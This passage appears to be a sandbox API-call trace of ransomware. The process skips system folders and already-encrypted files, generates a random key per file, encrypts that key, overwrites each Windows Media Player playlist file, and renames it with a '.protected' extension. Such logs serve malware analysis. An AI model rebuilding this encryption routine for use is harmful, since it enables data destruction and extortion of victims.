(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.950] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0093.956] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0093.956] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.956] CloseHandle (hObject=0x158) returned 1 [0093.957] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected") returned 134 [0093.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0093.958] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0093.958] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.958] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0093.958] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0093.959] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0093.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0093.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.968] CloseHandle (hObject=0x158) returned 1 [0093.968] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 132 [0093.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0093.969] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.970] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.970] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.970] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.970] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.971] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0093.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.977] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0093.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.977] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.978] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.978] CloseHandle (hObject=0x158) returned 1 [0093.978] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected") returned 135 [0093.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0093.979] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.979] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.979] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.979] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.980] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.007] CloseHandle (hObject=0x158) returned 1 [0094.007] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 137 [0094.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0094.058] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0094.058] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.058] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0094.058] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.058] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.058] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0094.059] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0094.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.066] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0094.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.067] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.067] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.067] CloseHandle (hObject=0x158) returned 1 [0094.067] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 132 [0094.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0094.069] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files (x86)") returned -1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0094.069] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.069] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0094.069] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.069] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.069] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync 